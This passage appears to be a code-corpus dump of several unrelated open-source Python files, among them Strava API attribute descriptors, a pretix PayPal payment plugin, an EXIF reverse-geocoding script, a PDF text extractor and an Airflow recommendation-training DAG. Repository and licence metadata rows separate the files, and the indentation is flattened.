structures and for capturing additional information about the model attributes.
"""
from __future__ import division, absolute_import, print_function, unicode_literals
import logging
from datetime import datetime, timedelta, tzinfo, date
from collections import namedtuple
from weakref import WeakKeyDictionary, WeakValueDictionary
import arrow
import pytz
from units.quantity import Quantity
import six
import stravalib.model
# Depending on the type of request, objects will be returned in meta, summary or detailed representations. The
# representation of the returned object is indicated by the resource_state attribute.
# (For more info, see https://strava.github.io/api/)
META = 1
SUMMARY = 2
DETAILED = 3
class Attribute(object):
"""
Base descriptor class for a Strava model attribute.
"""
_type = None
def __init__(self, type_, resource_states=None, units=None):
self.log = logging.getLogger('{0.__module__}.{0.__name__}'.format(self.__class__))
self.type = type_
self.resource_states = resource_states
self.data = WeakKeyDictionary()
self.units = units
def __get__(self, obj, clazz):
if obj is not None:
# It is being called on an object (not class)
# This can cause infinite loops, when we're attempting to get the resource_state attribute ...
#if hasattr(clazz, 'resource_state') \
# and obj.resource_state is not None \
# and not obj.resource_state in self.resource_states:
# raise AttributeError("attribute required resource state not satisfied by object")
return self.data.get(obj)
else:
# Rather than return the wrapped value, return the actual descriptor object
return self
def __set__(self, obj, val):
if val is not None:
self.data[obj] = self.unmarshal(val)
else:
self.data[obj] = None
@property
def type(self):
return self._type
@type.setter
def type(self, v):
self._type = v
def marshal(self, v):
"""
Turn this value into format for wire (JSON).
(By default this will just return the underlying object; subclasses
can override for specific behaviors -- e.g. date formatting.)
"""
if isinstance(v, Quantity):
return v.num
else:
return v
def unmarshal(self, v):
"""
Convert the value from parsed JSON structure to native python representation.
By default this will leave the value as-is since the JSON parsing routines
typically convert to native types. The exception may be date strings or other
more complex types, where subclasses will override this behavior.
"""
if self.units:
# Note that we don't want to cast to type in this case!
if not isinstance(v, Quantity):
v = self.units(v)
elif not isinstance(v, self.type):
v = self.type(v)
return v
class DateAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None):
super(DateAttribute, self).__init__(date, resource_states=resource_states)
def marshal(self, v):
"""
:param v: The date object to convert.
:type v: date
:return:
"""
return v.isoformat() if v else None
def unmarshal(self, v):
"""
Convert a date in "2012-12-13" format to a :class:`datetime.date` object.
"""
if not isinstance(v, date):
# 2012-12-13
v = datetime.strptime(v, "%Y-%m-%d").date()
return v
class TimestampAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None, tzinfo=pytz.utc):
super(TimestampAttribute, self).__init__(datetime, resource_states=resource_states)
self.tzinfo = tzinfo
def marshal(self, v):
"""
Serialize the timestamp to string.
:param v: The timestamp.
:type v: datetime
:return: The serialized date time.
"""
return v.isoformat() if v else None
def unmarshal(self, v):
"""
Convert a timestamp in "2012-12-13T03:43:19Z" format to a `datetime.datetime` object.
"""
if not isinstance(v, datetime):
if isinstance(v, six.integer_types):
v = arrow.get(v)
else:
try:
# Most dates are in this format 2012-12-13T03:43:19Z
v = datetime.strptime(v, "%Y-%m-%dT%H:%M:%SZ")
except ValueError:
# ... but not all.
v = arrow.get(v).datetime
# Translate to specified TZ
v = v.replace(tzinfo=self.tzinfo)
return v
LatLon = namedtuple('LatLon', ['lat', 'lon'])
class LocationAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None):
super(LocationAttribute, self).__init__(LatLon, resource_states=resource_states)
def marshal(self, v):
"""
Turn this value into format for wire (JSON).
:param v: The lat/lon.
:type v: LatLon
:return: Serialized format.
:rtype: str
"""
return "{lat},{lon}".format(lat=v.lat, lon=v.lon) if v else None
def unmarshal(self, v):
"""
"""
if not isinstance(v, LatLon):
v = LatLon(lat=v[0], lon=v[1])
return v
class TimezoneAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None):
super(TimezoneAttribute, self).__init__(pytz.timezone, resource_states=resource_states)
def unmarshal(self, v):
"""
Convert a timestamp in format "(GMT-08:00) America/Los_Angeles" to
a `pytz.timestamp` object.
"""
if not isinstance(v, tzinfo):
# (GMT-08:00) America/Los_Angeles
tzname = v.split(' ', 1)[1]
v = pytz.timezone(tzname)
return v
def marshal(self, v):
"""
Serialize time zone name.
:param v: The timezone.
:type v: tzdata
:return: The name of the time zone.
"""
return str(v) if v else None
class TimeIntervalAttribute(Attribute):
"""
Handles time durations, assumes upstream int value in seconds.
"""
def __init__(self, resource_states=None):
super(TimeIntervalAttribute, self).__init__(int, resource_states=resource_states)
def unmarshal(self, v):
"""
Convert the value from parsed JSON structure to native python representation.
By default this will leave the value as-is since the JSON parsing routines
typically convert to native types. The exception may be date strings or other
more complex types, where subclasses will override this behavior.
"""
if not isinstance(v, timedelta):
v = timedelta(seconds=v)
return v
def marshal(self, v):
"""
Serialize time zone name.
:param v: The timezone.
:type v: tzdata
:return: The name of the time zone.
"""
return str(v) if v else None
class ChoicesAttribute(Attribute):
"""
Attribute where there are several choices the attribute may take.
Allows conversion from the API value to a more helpful python value.
"""
def __init__(self, *args, **kwargs):
self.choices = kwargs.pop("choices", {})
super(ChoicesAttribute, self).__init__(*args, **kwargs)
def marshal(self, v):
"""
Turn this value into API format.
Do a reverse dictionary lookup on choices to find the original value. If
there are no keys or too many keys for now we raise a NotImplementedError
as marshal is not used anywhere currently. In the future we will want to
fail gracefully.
"""
if v:
orig = [i for i in self.choices if self.choices[i] == v]
if len(orig) == 1:
return orig[0]
elif len(orig) == 0:
# No such choice
raise NotImplementedError("No such reverse choice {0} for field {1}.".format(v, self))
else:
# Too many choices. We could return one possible choice (e.g. orig[0]).
raise NotImplementedError("Too many reverse choices {0} for value {1} for field {2}".format(orig, v, self))
def unmarshal(self, v):
"""
Convert the value from Strava API format to useful python representation.
If the value does not appear in the choices attribute we log an error rather
than raising an exception as this may be caused by a change to the API upstream
so we want to fail gracefully.
"""
try:
return self.choices[v]
except KeyError:
self.log.warning("No such choice {0} for field {1}.".format(v, self))
# Just return the value from the API
return v
class EntityAttribute(Attribute):
"""
Attribute for another entity.
"""
_lazytype = None
def __init__(self, *args, **kwargs):
super(EntityAttribute, self).__init__(*args, **kwargs)
self.bind_clients = WeakKeyDictionary()
@property
def type(self):
if self._lazytype:
clazz = getattr(stravalib.model, self._lazytype)
else:
clazz = self._type
return clazz
@type.setter
def type(self, v):
if isinstance(v, (six.text_type, six.binary_type)):
# Supporting lazy class referencing
self._lazytype = v
else:
self._type = v
def __set__(self, obj, val):
if val is not None:
# If the "owning" object has a bind_client set, we want to pass that
# down into the objects we are deserializing here
self.data[obj] = self.unmarshal(val, bind_client=getattr(obj, 'bind_client', None))
else:
self.data[obj] = None
def marshal(self, v):
"""
Turn an entity into a dictionary.
:param v: The entity to serialize.
:type v: stravalib.model.BaseEntity
:return: Dictionary of attributes
:rtype: Dict[str, Any]
"""
return v.to_dict() if v else None
def unmarshal(self, value, bind_client=None):
"""
Cast the specified value to the entity type.
"""
#self.log.debug("Unmarshall {0!r}: {1!r}".format(self, value))
if not isinstance(value, self.type):
o = self.type()
if bind_client is not None and hasattr(o.__class__, 'bind_client'):
o.bind_client = bind_client
if isinstance(value, dict):
for (k, v) in value.items():
if not hasattr(o.__class__, k):
self.log.warning("Unable to set attribute {0} on entity {1!r}".format(k, o))
else:
#self.log.debug("Setting attribute {0} on entity {1!r}".format(k, o))
setattr(o, k, v)
value = o
else:
raise Exception("Unable to unmarshall object {0!r}".format(value))
return value
class EntityCollection(EntityAttribute):
def marshal(self, values):
"""
Turn a list of entities into a list of dictionaries.
:param values: The entities to serialize.
:type values: List[stravalib.model.BaseEntity]
:return: List of dictionaries of attributes
:rtype: List[Dict[str, Any]]
"""
if values is not None:
return [super(EntityCollection, self).marshal(v) for v in values]
def unmarshal(self, values, bind_client=None):
"""
Cast the list.
"""
if values is not None:
return [super(EntityCollection, self).unmarshal(v, bind_client=bind_client) for v in values]
| apache-2.0 | 3,031,039,495,121,664,000 | 31.065963 | 123 | 0.581667 | false | 4.228601 | false | false | false |
mrgaaron/docs | source/conf.py | 1 | 4722 | # -*- coding: utf-8 -*-
#
# TempoIQ Manual documentation build configuration file
#
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('sphinxext'))
# -- General configuration ------------------------------------------------
html_context = {
# Github info for generating source links in documents
'gh_repository': 'TempoIQ/docs',
'gh_branch': 'master',
'display_github': True
}
# For development builds, invoke sphinx-build with '-t dev'.
if not tags.has('dev'):
tags.add('publish')
html_context['publish'] = True
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
'tempoiq_sphinx',
'snippets',
'redirect'
]
# List of valid snippet languages.
snippet_language_list = [
{
'key': 'python',
'name': 'Python',
'local_file': 'includes/python_snippets.py',
#'gh_repository': 'TempoIQ/tempoiq-python',
#'gh_branch': 'master',
#'gh_path': 'tests/test_snippets.py',
'line_comment': '#'
},
{
'key': 'node',
'name': 'Node.js',
'highlight': 'javascript',
'gh_repository': 'TempoIQ/tempoiq-node-js',
'gh_branch': 'master',
'gh_path': 'test/test_snippets.js',
'line_comment': '//'
},
{
'key': 'ruby',
'name': 'Ruby',
'local_file': 'includes/ruby_snippets.rb',
'line_comment': '#'
},
{
'key': 'java',
'name': 'Java',
'gh_repository': 'TempoIQ/tempoiq-java',
'gh_branch': 'master',
'gh_path': 'src/integration-test/java/com/tempoiq/Snippets.java',
'line_comment': '//'
},
{
'key': 'csharp',
'name': 'C#/.NET',
'local_file': 'includes/csharp_snippets.cs',
'line_comment': '//'
},
{
'key': 'http',
'name': 'HTTP',
'highlight': 'bash',
'line_comment': '#',
'local_file': 'includes/http_snippets.txt'
}
]
# Name of the default domain.
primary_domain = 'tempoiq'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'toc-main'
# A list of (type, target) tuples (by default empty) that should be ignored
# when generating warnings in “nitpicky mode”
nitpick_ignore = [
('tempoiq:class', 'String')
]
# General information about the project.
project = u'Documentation'
copyright = u'2015 TempoIQ Inc'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['includes/*']
# Include TODO directives in the output. Turn off for publishing in prod
if tags.has('dev'):
todo_include_todos = True
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Default language for syntax highlighting
highlight_language = 'javascript'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'tempoiq_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["themes"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "TempoIQ documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
| mit | -4,601,533,543,413,347,000 | 27.768293 | 79 | 0.639678 | false | 3.618098 | true | false | false |
chfoo/cloaked-octo-nemesis | areca-backup/git_fast_import.py | 1 | 2476 | import glob
import json
import zipfile
import tarfile
import os
import sys
import arrow
def main():
data_dir = 'data/'
infos = []
for info_filename in glob.glob(data_dir + '/*/info.json'):
with open(info_filename) as file:
info = json.loads(file.read())
info['date'] = arrow.get(info['date'])
infos.append(info)
infos = sorted(infos, key=lambda d:d['date'])
out_write = sys.stdout.write
def out_bwrite(data):
sys.stdout.flush()
sys.stdout.buffer.write(data)
sys.stdout.flush()
for info in infos:
dirname = os.path.join(data_dir, info['slug'])
for filename in glob.glob(dirname + '/*src*'):
archive_filename = filename
break
else:
raise Exception('Cannot find archive file.')
sys.stderr.write('=== {}\n'.format(info['slug']))
def get_files():
if archive_filename.endswith('zip'):
file = zipfile.ZipFile(archive_filename)
for name in file.namelist():
if name.startswith('areca-'):
fixed_name = name.split('/', 1)[-1].replace('//', '/')
else:
fixed_name = name
if not name.endswith('/'):
yield fixed_name, file.read(name)
else:
file = tarfile.open(archive_filename)
for name in file.getnames():
try:
yield name, file.extractfile(name).read()
except AttributeError:
# Not a file
pass
out_write('commit refs/heads/master\n')
out_write('committer Areca Backup <> {} +0000\n'.format(info['date'].timestamp))
commit_message = 'Release {}'.format(info['slug']).encode()
out_write('data {}\n'.format(len(commit_message)))
out_bwrite(commit_message)
out_write('\n')
out_write('deleteall\n')
for filename, data in get_files():
out_write('M 644 inline {}\n'.format(filename))
out_write('data {}\n'.format(len(data)))
out_bwrite(data)
out_write('\n')
out_write('\n')
if __name__ == '__main__':
main() | gpl-3.0 | 5,252,097,189,589,740,000 | 28.488095 | 88 | 0.476171 | false | 4.485507 | false | false | false |
awg24/pretix | src/pretix/plugins/paypal/payment.py | 3 | 9967 | import json
import logging
from collections import OrderedDict
import paypalrestsdk
from django import forms
from django.contrib import messages
from django.template.loader import get_template
from django.utils.translation import ugettext as __, ugettext_lazy as _
from pretix.base.models import Quota
from pretix.base.payment import BasePaymentProvider
from pretix.base.services.orders import mark_order_paid
from pretix.helpers.urls import build_absolute_uri
logger = logging.getLogger('pretix.plugins.paypal')
class Paypal(BasePaymentProvider):
identifier = 'paypal'
verbose_name = _('PayPal')
payment_form_fields = OrderedDict([
])
@property
def settings_form_fields(self):
return OrderedDict(
list(super().settings_form_fields.items()) + [
('endpoint',
forms.ChoiceField(
label=_('Endpoint'),
initial='live',
choices=(
('live', 'Live'),
('sandbox', 'Sandbox'),
),
)),
('client_id',
forms.CharField(
label=_('Client ID'),
)),
('secret',
forms.CharField(
label=_('Secret'),
))
]
)
def init_api(self):
paypalrestsdk.set_config(
mode="sandbox" if "sandbox" in self.settings.get('endpoint') else 'live',
client_id=self.settings.get('client_id'),
client_secret=self.settings.get('secret'))
def payment_is_valid_session(self, request):
return (request.session.get('payment_paypal_id', '') != ''
and request.session.get('payment_paypal_payer', '') != '')
def payment_form_render(self, request) -> str:
template = get_template('pretixplugins/paypal/checkout_payment_form.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings}
return template.render(ctx)
def checkout_prepare(self, request, cart):
self.init_api()
items = []
for cp in cart['positions']:
items.append({
"name": cp.item.name,
"description": str(cp.variation) if cp.variation else "",
"quantity": cp.count,
"price": str(cp.price),
"currency": request.event.currency
})
if cart['payment_fee']:
items.append({
"name": __('Payment method fee'),
"description": "",
"quantity": 1,
"currency": request.event.currency,
"price": str(cart['payment_fee'])
})
payment = paypalrestsdk.Payment({
'intent': 'sale',
'payer': {
"payment_method": "paypal",
},
"redirect_urls": {
"return_url": build_absolute_uri('plugins:paypal:return'),
"cancel_url": build_absolute_uri('plugins:paypal:abort'),
},
"transactions": [
{
"item_list": {
"items": items
},
"amount": {
"currency": request.event.currency,
"total": str(cart['total'])
},
"description": __('Event tickets for %s') % request.event.name
}
]
})
return self._create_payment(request, payment)
def _create_payment(self, request, payment):
try:
if payment.create():
if payment.state not in ('created', 'approved', 'pending'):
messages.error(request, _('We had trouble communicating with PayPal'))
logger.error('Invalid payment state: ' + str(payment))
return
request.session['payment_paypal_id'] = payment.id
request.session['payment_paypal_event'] = self.event.id
for link in payment.links:
if link.method == "REDIRECT" and link.rel == "approval_url":
return str(link.href)
else:
messages.error(request, _('We had trouble communicating with PayPal'))
logger.error('Error on creating payment: ' + str(payment.error))
except Exception as e:
messages.error(request, _('We had trouble communicating with PayPal'))
logger.error('Error on creating payment: ' + str(e))
def checkout_confirm_render(self, request) -> str:
"""
Returns the HTML that should be displayed when the user selected this provider
on the 'confirm order' page.
"""
template = get_template('pretixplugins/paypal/checkout_payment_confirm.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings}
return template.render(ctx)
def payment_perform(self, request, order) -> str:
"""
Will be called if the user submitted his order successfully to initiate the
payment process.
It should return a custom redirct URL, if you need special behaviour, or None to
continue with default behaviour.
On errors, it should use Django's message framework to display an error message
to the user (or the normal form validation error messages).
:param order: The order object
"""
if (request.session.get('payment_paypal_id', '') == ''
or request.session.get('payment_paypal_payer', '') == ''):
messages.error(request, _('We were unable to process your payment. See below for details on how to '
'proceed.'))
self.init_api()
payment = paypalrestsdk.Payment.find(request.session.get('payment_paypal_id'))
if str(payment.transactions[0].amount.total) != str(order.total) or payment.transactions[0].amount.currency != \
self.event.currency:
messages.error(request, _('We were unable to process your payment. See below for details on how to '
'proceed.'))
logger.error('Value mismatch: Order %s vs payment %s' % (order.id, str(payment)))
return
return self._execute_payment(payment, request, order)
def _execute_payment(self, payment, request, order):
payment.execute({"payer_id": request.session.get('payment_paypal_payer')})
if payment.state == 'pending':
messages.warning(request, _('PayPal has not yet approved the payment. We will inform you as soon as the '
'payment completed.'))
order = order.clone()
order.payment_info = json.dumps(payment.to_dict())
order.save()
return
if payment.state != 'approved':
messages.error(request, _('We were unable to process your payment. See below for details on how to '
'proceed.'))
logger.error('Invalid state: %s' % str(payment))
return
try:
mark_order_paid(order, 'paypal', json.dumps(payment.to_dict()))
messages.success(request, _('We successfully received your payment. Thank you!'))
except Quota.QuotaExceededException as e:
messages.error(request, str(e))
return None
def order_pending_render(self, request, order) -> str:
retry = True
try:
if order.payment_info and json.loads(order.payment_info)['state'] != 'pending':
retry = False
except KeyError:
pass
template = get_template('pretixplugins/paypal/pending.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings,
'retry': retry, 'order': order}
return template.render(ctx)
def order_control_render(self, request, order) -> str:
if order.payment_info:
payment_info = json.loads(order.payment_info)
else:
payment_info = None
template = get_template('pretixplugins/paypal/control.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings,
'payment_info': payment_info, 'order': order}
return template.render(ctx)
def order_control_refund_render(self, order) -> str:
return '<div class="alert alert-info">%s</div>' % _('The money will be automatically refunded.')
def order_control_refund_perform(self, request, order) -> "bool|str":
self.init_api()
if order.payment_info:
payment_info = json.loads(order.payment_info)
else:
payment_info = None
if not payment_info:
order.mark_refunded()
messages.warning(request, _('We were unable to transfer the money back automatically. '
'Please get in touch with the customer and transfer it back manually.'))
return
for res in payment_info['transactions'][0]['related_resources']:
for k, v in res.items():
if k == 'sale':
sale = paypalrestsdk.Sale.find(v['id'])
break
refund = sale.refund({})
if not refund.success():
order.mark_refunded()
messages.warning(request, _('We were unable to transfer the money back automatically. '
'Please get in touch with the customer and transfer it back manually.'))
else:
sale = paypalrestsdk.Payment.find(payment_info['id'])
order = order.mark_refunded()
order.payment_info = json.dumps(sale.to_dict())
order.save()
| apache-2.0 | 7,816,629,109,855,938,000 | 40.016461 | 120 | 0.548008 | false | 4.595205 | false | false | false |
fg1/exif-revgeo | exif_revgeo/__init__.py | 1 | 4683 | #!/usr/bin/python
# -*- encoding: utf-8 -*-
"""
exif-revgeo
~~~~~~~~~~~
This utility reads the GPS coordinates from your photos, reverse geocode
them, and write the result to the appropriate EXIF city/country location
tags.
:copyright: (c) 2015 by fg1
:license: BSD, see LICENSE for more details
"""
from __future__ import print_function
import os
import json
import shlex
import logging
import argparse
import requests
import subprocess
__version__ = "0.1.0"
# IPTC tags used for the location
EXIF_IPTC_LOC = ['City', 'Country-PrimaryLocationName', 'Country-PrimaryLocationCode']
# Description of the webservice doing the reverse geocoding
REVERSE_GEOCODE_URL = 'http://127.0.0.1:8080/rg/%(lat)f/%(lng)f/0.01'
REVERSE_GEOCODE_TRANS = {u"city": u"City",
u"country": u"Country-PrimaryLocationName",
u"country_iso3166-3": u"Country-PrimaryLocationCode"}
# ----------------------------------------------------------------------------
# Helper functions
logging.basicConfig(format='%(asctime)-15s %(message)s')
log = logging.getLogger('exifloc')
def filter_keys(d, keys):
"""
Returns dict 'd' with only the keys specified in 'keys'
"""
return dict((k, v) for k, v in d.iteritems() if k in keys)
def exclude_keys(d, keys):
"""
Returns dict 'd' without the keys specified in 'keys'
"""
return dict((k, v) for k, v in d.iteritems() if k not in keys)
# ----------------------------------------------------------------------------
# Reverse geocoding
def reverse_geocode(lat, lng):
r = requests.get(REVERSE_GEOCODE_URL % {'lat': lat, 'lng': lng})
if r.status_code != 200:
return None
else:
return json.loads(r.text)
# ----------------------------------------------------------------------------
# EXIF read/write operations
def extract_exif_tags(exiftool_bin, path, rd_args):
if isinstance(path, basestring):
path = [path]
iptc_tags = ['-' + t for t in EXIF_IPTC_LOC]
data = subprocess.check_output([exiftool_bin] +
shlex.split(rd_args) +
shlex.split('-q -n -j -GPSLatitude -GPSLongitude') +
iptc_tags + path)
data = json.loads(data)
return data
def tag_location(exiftool_bin, wr_args, info, overwrite_tags, dry_run):
rg_loc = reverse_geocode(info['GPSLatitude'], info['GPSLongitude'])
if rg_loc == None:
log.warn('Error getting info for %(SourceFile)s (%(GPSLatitude)f, %(GPSLongitude)f)', info)
return
# Adapts the returned object to the IPTC names
for k, v in REVERSE_GEOCODE_TRANS.iteritems():
if k not in rg_loc:
log.warn('Unable to find "' + k + '" in returned location: ' + str(rg_loc))
return
rg_loc[v] = rg_loc.pop(k)
rg_loc = filter_keys(rg_loc, EXIF_IPTC_LOC)
# Only add tags where they are missing
if not overwrite_tags:
exif_loc = filter_keys(info, EXIF_IPTC_LOC)
rg_loc = exclude_keys(rg_loc, exif_loc.keys())
if len(rg_loc) == 0:
return
# Build exiftool command
cmd = [exiftool_bin] + shlex.split(wr_args)
for k, v in rg_loc.iteritems():
cmd.append('-' + k + "=" + v + "")
cmd.append(info['SourceFile'])
# Execute command
print("> " + ' '.join(cmd))
if dry_run:
return
subprocess.check_call(cmd)
# ----------------------------------------------------------------------------
# Main
def main(args):
tags = extract_exif_tags(args.exiftool_bin, args.path, args.rd_args)
# Keeps only the files where the latitude and longitude are set
tags = [t for t in tags if 'GPSLatitude' in t and 'GPSLongitude' in t]
for t in tags:
tag_location(args.exiftool_bin, args.wr_args, t, args.overwrite_tags, args.dry_run)
def cli():
parser = argparse.ArgumentParser(description='Add city and country in EXIF based on GPS coords')
parser.add_argument('--exiftool-bin', type=str, help='exiftool binary to use', default='exiftool')
parser.add_argument('--rd-args', type=str, help='exiftool read arguments', default='')
parser.add_argument('--wr-args', type=str, help='exiftool write arguments', default='-overwrite_original')
parser.add_argument('-o', '--overwrite-tags', action='store_true', help='Overwrite existing tag values')
parser.add_argument('path', type=str, help='files or folder to process')
parser.add_argument('-d', '--dry-run', action='store_true', help='Do not perform any file modification')
args = parser.parse_args()
main(args)
if __name__ == "__main__":
cli()
| bsd-3-clause | 5,753,826,818,839,148,000 | 33.688889 | 110 | 0.585522 | false | 3.558511 | false | false | false |
felipegerard/arte_mexicano_antiguo | felipegerard/code/luigi/itm/build/lib/itm/text_extraction_functions.py | 12 | 3950 | # coding=utf-8
import os
import io
import sys
import logging
import shutil
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
from nltk import wordpunct_tokenize
from nltk.corpus import stopwords
def obtener_rutas(rutaBase, extension='.pdf', blacklist=None):
if blacklist is None:
return [os.path.join(rutaBase,x) for x in os.listdir(rutaBase) if extension in x]
else:
return [os.path.join(rutaBase,x) for x in os.listdir(rutaBase) if (extension in x) and (x not in blacklist)]
def calcularValoresDeIdioma(contenido):
languages_ratios = {}
tokens = wordpunct_tokenize(contenido)
words = [word.lower() for word in tokens]
for language in stopwords.fileids():
stopwords_set = set(stopwords.words(language))
words_set = set(words)
common_elements = words_set.intersection(stopwords_set)
languages_ratios[language] = len(common_elements)
return languages_ratios
def detectarIdioma(contenido):
valores = calcularValoresDeIdioma(contenido)
idioma = max(valores, key=valores.get)
return idioma
def convertir(rutaVolumen, hojas=None):
if not hojas:
hojas = set()
else:
hojas = set(hojas)
output = StringIO()
manager = PDFResourceManager()
converter = TextConverter(manager, output, laparams=LAParams())
interpreter = PDFPageInterpreter(manager, converter)
infile = file(rutaVolumen, 'rb')
for hoja in PDFPage.get_pages(infile, hojas):
interpreter.process_page(hoja)
infile.close()
converter.close()
text = output.getvalue()
output.close
return text
def convertirVolumenes(rutaVolumenes):
txt = ""
for rutaVolumen in rutaVolumenes:
try:
txt += convertir(rutaVolumen)
except Exception:
logging.info("ERROR al convertir el volumen "+rutaVolumen)
print "ERROR al convertir el volumen "+rutaVolumen
return txt
def extraerVolumen(inputPDF):
print "---------------------------------"
print "Convirtiendo "+inputPDF.path
rutaVolumenes = obtener_rutas(inputPDF.path, '.pdf')
contenido = convertirVolumenes(rutaVolumenes)
idioma = detectarIdioma(contenido)
return idioma, contenido
# Guardar metadatos
def guardarMetadatos(book_name,idioma,txt_dir,meta_file):
outfile = book_name
meta = os.path.join(txt_dir, meta_file)
flag = True
if os.path.exists(meta):
with open(meta, 'r') as f:
log = f.read()
if outfile in log:
flag = False
if flag:
with open(meta, 'a+') as f:
f.write(outfile + '\t'+ idioma + '\n')
def save_content(target_dir, book_name, content):
if not os.path.exists(target_dir):
os.makedirs(target_dir)
print '--------------------'
print 'Creando carpeta ' + target_dir
# Guardar contenido
book_path = os.path.join(target_dir,book_name+'.txt')
with open(book_path, 'w') as f:
f.write(content)
print book_name + ' --> ' + target_dir
def get_extracts(string, min_length=500, percentages=[0.1,0.5,0.9], max_start_offset=10, max_lines=20):
str_list = string.split('\n')
positions = [int(p*len(str_list)) for p in percentages]
extracts = []
for p in positions:
s = ''
for i in range(p, min(p + max_start_offset, len(str_list)-1), 1):
if len(str_list[i]) > 0 and str_list[i][0].isupper():
break
p = p + 1
for i in range(p, min(p + max_lines, len(str_list)-1), 1):
if len(s) >= min_length:
break
else:
s += '\n' + str_list[i]
extracts.append({'start_line':p, 'start_line_perc':round(1.0*p/len(str_list),3), 'text':s})
return extracts
| agpl-3.0 | 6,755,058,549,600,436,000 | 29.384615 | 110 | 0.643544 | false | 3.188055 | false | false | false |
GoogleCloudPlatform/tensorflow-recommendation-wals | airflow/dags/training.py | 1 | 4688 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DAG definition for recserv model training."""
import airflow
from airflow import DAG
from airflow.contrib.operators.bigquery_operator import BigQueryOperator
from airflow.contrib.operators.bigquery_to_gcs import BigQueryToCloudStorageOperator
from airflow.hooks.base_hook import BaseHook
from airflow.operators.app_engine_admin_plugin import AppEngineVersionOperator
from airflow.operators.ml_engine_plugin import MLEngineTrainingOperator
import datetime
def _get_project_id():
"""Get project ID from default GCP connection."""
extras = BaseHook.get_connection('google_cloud_default').extra_dejson
key = 'extra__google_cloud_platform__project'
if key in extras:
project_id = extras[key]
else:
raise ('Must configure project_id in google_cloud_default '
'connection from Airflow Console')
return project_id
PROJECT_ID = _get_project_id()
# Data set constants, used in BigQuery tasks. You can change these
# to conform to your data.
DATASET = 'GA360_test'
TABLE_NAME = 'ga_sessions_sample'
ARTICLE_CUSTOM_DIMENSION = '10'
# GCS bucket names and region, can also be changed.
BUCKET = 'gs://recserve_' + PROJECT_ID
REGION = 'us-east1'
# The code package name comes from the model code in the wals_ml_engine
# directory of the solution code base.
PACKAGE_URI = BUCKET + '/code/wals_ml_engine-0.1.tar.gz'
JOB_DIR = BUCKET + '/jobs'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(2),
'email': ['airflow@example.com'],
'email_on_failure': True,
'email_on_retry': False,
'retries': 5,
'retry_delay': datetime.timedelta(minutes=5)
}
# Default schedule interval using cronjob syntax - can be customized here
# or in the Airflow console.
schedule_interval = '00 21 * * *'
dag = DAG('recommendations_training_v1', default_args=default_args,
schedule_interval=schedule_interval)
dag.doc_md = __doc__
#
#
# Task Definition
#
#
# BigQuery training data query
bql='''
#legacySql
SELECT
fullVisitorId as clientId,
ArticleID as contentId,
(nextTime - hits.time) as timeOnPage,
FROM(
SELECT
fullVisitorId,
hits.time,
MAX(IF(hits.customDimensions.index={0},
hits.customDimensions.value,NULL)) WITHIN hits AS ArticleID,
LEAD(hits.time, 1) OVER (PARTITION BY fullVisitorId, visitNumber
ORDER BY hits.time ASC) as nextTime
FROM [{1}.{2}.{3}]
WHERE hits.type = "PAGE"
) HAVING timeOnPage is not null and contentId is not null;
'''
bql = bql.format(ARTICLE_CUSTOM_DIMENSION, PROJECT_ID, DATASET, TABLE_NAME)
t1 = BigQueryOperator(
task_id='bq_rec_training_data',
bql=bql,
destination_dataset_table='%s.recommendation_events' % DATASET,
write_disposition='WRITE_TRUNCATE',
dag=dag)
# BigQuery training data export to GCS
training_file = BUCKET + '/data/recommendation_events.csv'
t2 = BigQueryToCloudStorageOperator(
task_id='bq_export_op',
source_project_dataset_table='%s.recommendation_events' % DATASET,
destination_cloud_storage_uris=[training_file],
export_format='CSV',
dag=dag
)
# ML Engine training job
job_id = 'recserve_{0}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M'))
job_dir = BUCKET + '/jobs/' + job_id
output_dir = BUCKET
training_args = ['--job-dir', job_dir,
'--train-file', training_file,
'--output-dir', output_dir,
'--data-type', 'web_views',
'--use-optimized']
t3 = MLEngineTrainingOperator(
